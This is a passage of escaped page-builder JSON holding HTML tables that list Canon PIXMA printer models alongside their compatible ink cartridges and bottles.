width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-831 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-830 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n<td>CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\">\\n<tbody>\\n<tr>\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP610<\\/td>\\n<td width=\\\"208\\\">CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP628<\\/td>\\n<td width=\\\"208\\\">CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP638<\\/td>\\n<td width=\\\"208\\\">CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP648<\\/td>\\n<td width=\\\"208\\\">CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP800<\\/td>\\n<td width=\\\"208\\\">CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP800R<\\/td>\\n<td width=\\\"208\\\">CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP810<\\/td>\\n<td width=\\\"208\\\">CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-5 (Pigment 